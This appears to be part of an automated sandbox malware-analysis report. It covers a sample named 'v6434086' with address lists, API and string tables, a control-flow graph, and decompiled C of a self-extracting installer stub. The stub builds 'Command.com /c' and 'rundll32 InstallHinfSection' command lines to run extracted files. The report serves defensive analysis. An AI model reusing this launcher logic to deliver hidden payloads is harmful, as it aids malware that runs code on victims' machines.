                                                                                                                                                                                                        0x00bc3c65
                                                                                                                                                                                                        0x00bc3c77
                                                                                                                                                                                                        0x00bc3c78
                                                                                                                                                                                                        0x00bc3c7c
                                                                                                                                                                                                        0x00bc3c7e
                                                                                                                                                                                                        0x00bc3c82
                                                                                                                                                                                                        0x00bc3c82
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3c7c
                                                                                                                                                                                                        0x00bc3c67
                                                                                                                                                                                                        0x00bc3c69
                                                                                                                                                                                                        0x00bc3c6d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3c58
                                                                                                                                                                                                        0x00bc3c58
                                                                                                                                                                                                        0x00bc3c6e
                                                                                                                                                                                                        0x00bc3c6e
                                                                                                                                                                                                        0x00bc3c87
                                                                                                                                                                                                        0x00bc3c89
                                                                                                                                                                                                        0x00bc3d4d
                                                                                                                                                                                                        0x00bc3d4f
                                                                                                                                                                                                        0x00bc3d50
                                                                                                                                                                                                        0x00bc3d52
                                                                                                                                                                                                        0x00bc3d9e
                                                                                                                                                                                                        0x00bc3da8
                                                                                                                                                                                                        0x00bc3daf
                                                                                                                                                                                                        0x00bc3db4
                                                                                                                                                                                                        0x00bc3db6
                                                                                                                                                                                                        0x00bc3f4d
                                                                                                                                                                                                        0x00bc3f4d
                                                                                                                                                                                                        0x00bc3f4f
                                                                                                                                                                                                        0x00bc3f56
                                                                                                                                                                                                        0x00bc3f57
                                                                                                                                                                                                        0x00bc3f58
                                                                                                                                                                                                        0x00bc3f63
                                                                                                                                                                                                        0x00bc3f63
                                                                                                                                                                                                        0x00bc3dbc
                                                                                                                                                                                                        0x00bc3dc0
                                                                                                                                                                                                        0x00bc3dc2
                                                                                                                                                                                                        0x00bc3de6
                                                                                                                                                                                                        0x00bc3de6
                                                                                                                                                                                                        0x00bc3de8
                                                                                                                                                                                                        0x00bc3f0b
                                                                                                                                                                                                        0x00bc3f0b
                                                                                                                                                                                                        0x00bc3f0f
                                                                                                                                                                                                        0x00bc3f13
                                                                                                                                                                                                        0x00bc3f15
                                                                                                                                                                                                        0x00bc3f1a
                                                                                                                                                                                                        0x00bc3f1c
                                                                                                                                                                                                        0x00bc3f46
                                                                                                                                                                                                        0x00bc3f47
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3f47
                                                                                                                                                                                                        0x00bc3f1e
                                                                                                                                                                                                        0x00bc3f1f
                                                                                                                                                                                                        0x00bc3f25
                                                                                                                                                                                                        0x00bc3f26
                                                                                                                                                                                                        0x00bc3f2a
                                                                                                                                                                                                        0x00bc3f2d
                                                                                                                                                                                                        0x00bc3fd9
                                                                                                                                                                                                        0x00bc3fd9
                                                                                                                                                                                                        0x00bc3fda
                                                                                                                                                                                                        0x00bc3fda
                                                                                                                                                                                                        0x00bc3fe1
                                                                                                                                                                                                        0x00bc3fe3
                                                                                                                                                                                                        0x00bc3fe3
                                                                                                                                                                                                        0x00bc3fe8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3fe8
                                                                                                                                                                                                        0x00bc3f33
                                                                                                                                                                                                        0x00bc3f37
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3f37
                                                                                                                                                                                                        0x00bc3dee
                                                                                                                                                                                                        0x00bc3dee
                                                                                                                                                                                                        0x00bc3df5
                                                                                                                                                                                                        0x00bc3fad
                                                                                                                                                                                                        0x00bc3fb9
                                                                                                                                                                                                        0x00bc3fc2
                                                                                                                                                                                                        0x00bc3fc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3fc8
                                                                                                                                                                                                        0x00bc3dfb
                                                                                                                                                                                                        0x00bc3dfd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3e03
                                                                                                                                                                                                        0x00bc3e0a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3e15
                                                                                                                                                                                                        0x00bc3e17
                                                                                                                                                                                                        0x00bc3e19
                                                                                                                                                                                                        0x00bc3f94
                                                                                                                                                                                                        0x00bc3fa4
                                                                                                                                                                                                        0x00bc3f7c
                                                                                                                                                                                                        0x00bc3f80
                                                                                                                                                                                                        0x00bc3f8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3f8b
                                                                                                                                                                                                        0x00bc3e2c
                                                                                                                                                                                                        0x00bc3e30
                                                                                                                                                                                                        0x00bc3e34
                                                                                                                                                                                                        0x00bc3e36
                                                                                                                                                                                                        0x00bc3f69
                                                                                                                                                                                                        0x00bc3f6e
                                                                                                                                                                                                        0x00bc3f70
                                                                                                                                                                                                        0x00bc3f76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3f76
                                                                                                                                                                                                        0x00bc3e3c
                                                                                                                                                                                                        0x00bc3e43
                                                                                                                                                                                                        0x00bc3e47
                                                                                                                                                                                                        0x00bc3e52
                                                                                                                                                                                                        0x00bc3e56
                                                                                                                                                                                                        0x00bc3e5c
                                                                                                                                                                                                        0x00bc3e61
                                                                                                                                                                                                        0x00bc3e68
                                                                                                                                                                                                        0x00bc3e70
                                                                                                                                                                                                        0x00bc3e74
                                                                                                                                                                                                        0x00bc3e7c
                                                                                                                                                                                                        0x00bc3e80
                                                                                                                                                                                                        0x00bc3e82
                                                                                                                                                                                                        0x00bc3e82
                                                                                                                                                                                                        0x00bc3e87
                                                                                                                                                                                                        0x00bc3e87
                                                                                                                                                                                                        0x00bc3e8b
                                                                                                                                                                                                        0x00bc3e91
                                                                                                                                                                                                        0x00bc3e94
                                                                                                                                                                                                        0x00bc3e96
                                                                                                                                                                                                        0x00bc3e96
                                                                                                                                                                                                        0x00bc3e9b
                                                                                                                                                                                                        0x00bc3e9b
                                                                                                                                                                                                        0x00bc3e9f
                                                                                                                                                                                                        0x00bc3ea2
                                                                                                                                                                                                        0x00bc3ea4
                                                                                                                                                                                                        0x00bc3ea4
                                                                                                                                                                                                        0x00bc3ea9
                                                                                                                                                                                                        0x00bc3ea9
                                                                                                                                                                                                        0x00bc3ead
                                                                                                                                                                                                        0x00bc3eb3
                                                                                                                                                                                                        0x00bc3eb6
                                                                                                                                                                                                        0x00bc3eb8
                                                                                                                                                                                                        0x00bc3eb8
                                                                                                                                                                                                        0x00bc3ebd
                                                                                                                                                                                                        0x00bc3ebd
                                                                                                                                                                                                        0x00bc3ec1
                                                                                                                                                                                                        0x00bc3ec3
                                                                                                                                                                                                        0x00bc3ec5
                                                                                                                                                                                                        0x00bc3ec5
                                                                                                                                                                                                        0x00bc3eca
                                                                                                                                                                                                        0x00bc3eca
                                                                                                                                                                                                        0x00bc3ece
                                                                                                                                                                                                        0x00bc3ed5
                                                                                                                                                                                                        0x00bc3ed9
                                                                                                                                                                                                        0x00bc3ee0
                                                                                                                                                                                                        0x00bc3ee6
                                                                                                                                                                                                        0x00bc3eea
                                                                                                                                                                                                        0x00bc3eec
                                                                                                                                                                                                        0x00bc3eee
                                                                                                                                                                                                        0x00bc3ef3
                                                                                                                                                                                                        0x00bc3ef3
                                                                                                                                                                                                        0x00bc3ef5
                                                                                                                                                                                                        0x00bc3efa
                                                                                                                                                                                                        0x00bc3efb
                                                                                                                                                                                                        0x00bc3efd
                                                                                                                                                                                                        0x00bc3f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3eff
                                                                                                                                                                                                        0x00bc3eff
                                                                                                                                                                                                        0x00bc3f05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3f05
                                                                                                                                                                                                        0x00bc3efd
                                                                                                                                                                                                        0x00bc3dc7
                                                                                                                                                                                                        0x00bc3dce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3dd0
                                                                                                                                                                                                        0x00bc3dd7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3dd9
                                                                                                                                                                                                        0x00bc3ddb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3ddd
                                                                                                                                                                                                        0x00bc3de1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3de1
                                                                                                                                                                                                        0x00bc3d59
                                                                                                                                                                                                        0x00bc3d65
                                                                                                                                                                                                        0x00bc3d6a
                                                                                                                                                                                                        0x00bc3d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3d6e
                                                                                                                                                                                                        0x00bc3d75
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3d8f
                                                                                                                                                                                                        0x00bc3d96
                                                                                                                                                                                                        0x00bc3d98
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3d98
                                                                                                                                                                                                        0x00bc3c8f
                                                                                                                                                                                                        0x00bc3c98
                                                                                                                                                                                                        0x00bc3cf1
                                                                                                                                                                                                        0x00bc3cf3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3cfe
                                                                                                                                                                                                        0x00bc3d11
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3d11
                                                                                                                                                                                                        0x00bc3c9c
                                                                                                                                                                                                        0x00bc3ca5
                                                                                                                                                                                                        0x00bc3ca7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3cad
                                                                                                                                                                                                        0x00bc3cb2
                                                                                                                                                                                                        0x00bc3cb7
                                                                                                                                                                                                        0x00bc3cc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3ce8
                                                                                                                                                                                                        0x00bc3cec
                                                                                                                                                                                                        0x00bc3ced
                                                                                                                                                                                                        0x00bc3ced
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3ce8
                                                                                                                                                                                                        0x00bc3c9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3c9e
                                                                                                                                                                                                        0x00bc3c56
                                                                                                                                                                                                        0x00bc3d35
                                                                                                                                                                                                        0x00bc3d35
                                                                                                                                                                                                        0x00bc3d3c
                                                                                                                                                                                                        0x00bc3d48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3d48
                                                                                                                                                                                                        0x00bc3c03
                                                                                                                                                                                                        0x00bc3be2
                                                                                                                                                                                                        0x00bc3be7
                                                                                                                                                                                                        0x00bc3bee
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC3C11
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00BC3CDC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                          • Part of subcall function 00BC468F: SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00BC8C42), ref: 00BC3D8F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00BC3E26
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00BC8C42), ref: 00BC3EFF
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00BC8C42), ref: 00BC3F1F
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00BC8C42), ref: 00BC3F40
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00BC8C42), ref: 00BC3F47
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00BC8C42), ref: 00BC3F76
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00BC8C42), ref: 00BC3F80
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00BC8C42), ref: 00BC3FC2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                        • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$photo660
                                                                                                                                                                                                        • API String ID: 1032054927-272976373
                                                                                                                                                                                                        • Opcode ID: 38b39775c68f3960719163464c8e88720dc3c540047b1c24b9497a6f17962d6e
                                                                                                                                                                                                        • Instruction ID: 51ac02b45475e0fa38d924338fabf0f5a44b7542f3155222adb46682840e4aa9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38b39775c68f3960719163464c8e88720dc3c540047b1c24b9497a6f17962d6e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2B1E4706043019BE720DF248885F6B77E4EB89B54F5089ADFA96E7191DB70CE44CBA2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 141 bc1ae8-bc1b2c call bc1680 144 bc1b2e-bc1b39 141->144 145 bc1b3b-bc1b40 141->145 146 bc1b46-bc1b61 call bc1a84 144->146 145->146 149 bc1b9f-bc1bc2 call bc1781 call bc658a 146->149 150 bc1b63-bc1b65 146->150 157 bc1bc7-bc1bd3 call bc66c8 149->157 152 bc1b68-bc1b6d 150->152 152->152 154 bc1b6f-bc1b74 152->154 154->149 156 bc1b76-bc1b7b 154->156 158 bc1b7d-bc1b81 156->158 159 bc1b83-bc1b86 156->159 166 bc1bd9-bc1bf1 CompareStringA 157->166 167 bc1d73-bc1d7f call bc66c8 157->167 158->159 162 bc1b8c-bc1b9d call bc1680 158->162 159->149 160 bc1b88-bc1b8a 159->160 160->149 160->162 162->157 166->167 168 bc1bf7-bc1c07 GetFileAttributesA 166->168 175 bc1df8-bc1e09 LocalAlloc 167->175 176 bc1d81-bc1d99 CompareStringA 167->176 170 bc1c0d-bc1c15 168->170 171 bc1d53-bc1d5e 168->171 170->171 174 bc1c1b-bc1c33 call bc1a84 170->174 173 bc1d64-bc1d6e call bc44b9 171->173 191 bc1e94-bc1ea4 call bc6ce0 173->191 187 bc1c35-bc1c38 174->187 188 bc1c50-bc1c61 LocalAlloc 174->188 179 bc1e0b-bc1e1b GetFileAttributesA 175->179 180 bc1dd4-bc1ddf 175->180 176->175 177 bc1d9b-bc1da2 176->177 183 bc1da5-bc1daa 177->183 185 bc1e1d-bc1e1f 179->185 186 bc1e67-bc1e73 call bc1680 179->186 180->173 183->183 189 bc1dac-bc1db4 183->189 185->186 192 bc1e21-bc1e3e call bc1781 185->192 197 bc1e78-bc1e84 call bc2aac 186->197 193 bc1c3a 187->193 194 bc1c40-bc1c4b call bc1a84 187->194 188->180 196 bc1c67-bc1c72 188->196 195 bc1db7-bc1dbc 189->195 192->197 211 bc1e40-bc1e43 192->211 193->194 194->188 195->195 201 bc1dbe-bc1dd2 LocalAlloc 195->201 202 bc1c79-bc1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 196->202 203 bc1c74 196->203 210 bc1e89-bc1e92 197->210 201->180 207 bc1de1-bc1df3 call bc171e 201->207 208 bc1cf8-bc1d07 202->208 209 bc1cc2-bc1ccc 202->209 203->202 207->210 213 bc1d09-bc1d21 GetShortPathNameA 208->213 214 bc1d23 208->214 216 bc1cce 209->216 217 bc1cd3-bc1cf3 call bc1680 * 2 209->217 210->191 211->197 212 bc1e45-bc1e65 call bc16b3 * 2 211->212 212->197 219 bc1d28-bc1d2b 213->219 214->219 216->217 217->210 223 bc1d2d 219->223 224 bc1d32-bc1d4e call bc171e 219->224 223->224 224->210
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00BC1AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00BC1680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00BC1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00BC1781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
					E00BC658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00BC1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E00BC66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00BC66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00BC1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00BC1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00BC16B3( &_v1552, 0x400, " ");
										E00BC16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00BC2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00BC171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00BC1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00BC1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E00BC44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0xbc9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xbc1140, _t156, 8,  &_v268) == 0) {
										 *0xbc9a34 =  *0xbc9a34 & 0xfffffffb;
										if( *0xbc9a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E00BC171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0xbc9a34 =  *0xbc9a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00BC1680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00BC1680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00BC6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}














































                                                                                                                                                                                                        0x00bc1af3
                                                                                                                                                                                                        0x00bc1afa
                                                                                                                                                                                                        0x00bc1b07
                                                                                                                                                                                                        0x00bc1b09
                                                                                                                                                                                                        0x00bc1b1a
                                                                                                                                                                                                        0x00bc1b20
                                                                                                                                                                                                        0x00bc1b2c
                                                                                                                                                                                                        0x00bc1b3b
                                                                                                                                                                                                        0x00bc1b40
                                                                                                                                                                                                        0x00bc1b2e
                                                                                                                                                                                                        0x00bc1b2e
                                                                                                                                                                                                        0x00bc1b33
                                                                                                                                                                                                        0x00bc1b33
                                                                                                                                                                                                        0x00bc1b46
                                                                                                                                                                                                        0x00bc1b4c
                                                                                                                                                                                                        0x00bc1b52
                                                                                                                                                                                                        0x00bc1b57
                                                                                                                                                                                                        0x00bc1b5d
                                                                                                                                                                                                        0x00bc1b61
                                                                                                                                                                                                        0x00bc1b9f
                                                                                                                                                                                                        0x00bc1b9f
                                                                                                                                                                                                        0x00bc1bb1
                                                                                                                                                                                                        0x00bc1bc2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1b63
                                                                                                                                                                                                        0x00bc1b63
                                                                                                                                                                                                        0x00bc1b65
                                                                                                                                                                                                        0x00bc1b68
                                                                                                                                                                                                        0x00bc1b68
                                                                                                                                                                                                        0x00bc1b6a
                                                                                                                                                                                                        0x00bc1b6b
                                                                                                                                                                                                        0x00bc1b6f
                                                                                                                                                                                                        0x00bc1b74
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1b76
                                                                                                                                                                                                        0x00bc1b7b
                                                                                                                                                                                                        0x00bc1b86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1b8c
                                                                                                                                                                                                        0x00bc1b8c
                                                                                                                                                                                                        0x00bc1b98
                                                                                                                                                                                                        0x00bc1bc7
                                                                                                                                                                                                        0x00bc1bc9
                                                                                                                                                                                                        0x00bc1bcc
                                                                                                                                                                                                        0x00bc1bd3
                                                                                                                                                                                                        0x00bc1d75
                                                                                                                                                                                                        0x00bc1d76
                                                                                                                                                                                                        0x00bc1d78
                                                                                                                                                                                                        0x00bc1d7f
                                                                                                                                                                                                        0x00bc1e05
                                                                                                                                                                                                        0x00bc1e09
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1e12
                                                                                                                                                                                                        0x00bc1e1b
                                                                                                                                                                                                        0x00bc1e73
                                                                                                                                                                                                        0x00bc1e21
                                                                                                                                                                                                        0x00bc1e21
                                                                                                                                                                                                        0x00bc1e28
                                                                                                                                                                                                        0x00bc1e37
                                                                                                                                                                                                        0x00bc1e3e
                                                                                                                                                                                                        0x00bc1e52
                                                                                                                                                                                                        0x00bc1e60
                                                                                                                                                                                                        0x00bc1e60
                                                                                                                                                                                                        0x00bc1e3e
                                                                                                                                                                                                        0x00bc1e79
                                                                                                                                                                                                        0x00bc1e7b
                                                                                                                                                                                                        0x00bc1e84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1d9b
                                                                                                                                                                                                        0x00bc1d9b
                                                                                                                                                                                                        0x00bc1da0
                                                                                                                                                                                                        0x00bc1da2
                                                                                                                                                                                                        0x00bc1da5
                                                                                                                                                                                                        0x00bc1da5
                                                                                                                                                                                                        0x00bc1da7
                                                                                                                                                                                                        0x00bc1da8
                                                                                                                                                                                                        0x00bc1dac
                                                                                                                                                                                                        0x00bc1dae
                                                                                                                                                                                                        0x00bc1db4
                                                                                                                                                                                                        0x00bc1db7
                                                                                                                                                                                                        0x00bc1db7
                                                                                                                                                                                                        0x00bc1db9
                                                                                                                                                                                                        0x00bc1dba
                                                                                                                                                                                                        0x00bc1dbe
                                                                                                                                                                                                        0x00bc1dc3
                                                                                                                                                                                                        0x00bc1dce
                                                                                                                                                                                                        0x00bc1dd2
                                                                                                                                                                                                        0x00bc1deb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1df0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1dd2
                                                                                                                                                                                                        0x00bc1bf7
                                                                                                                                                                                                        0x00bc1bfe
                                                                                                                                                                                                        0x00bc1c07
                                                                                                                                                                                                        0x00bc1d55
                                                                                                                                                                                                        0x00bc1d5a
                                                                                                                                                                                                        0x00bc1d5b
                                                                                                                                                                                                        0x00bc1d5d
                                                                                                                                                                                                        0x00bc1d5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1c1b
                                                                                                                                                                                                        0x00bc1c1b
                                                                                                                                                                                                        0x00bc1c20
                                                                                                                                                                                                        0x00bc1c2c
                                                                                                                                                                                                        0x00bc1c33
                                                                                                                                                                                                        0x00bc1c38
                                                                                                                                                                                                        0x00bc1c3a
                                                                                                                                                                                                        0x00bc1c3a
                                                                                                                                                                                                        0x00bc1c40
                                                                                                                                                                                                        0x00bc1c4b
                                                                                                                                                                                                        0x00bc1c4b
                                                                                                                                                                                                        0x00bc1c5d
                                                                                                                                                                                                        0x00bc1c61
                                                                                                                                                                                                        0x00bc1dd4
                                                                                                                                                                                                        0x00bc1dd4
                                                                                                                                                                                                        0x00bc1dd6
                                                                                                                                                                                                        0x00bc1ddb
                                                                                                                                                                                                        0x00bc1ddc
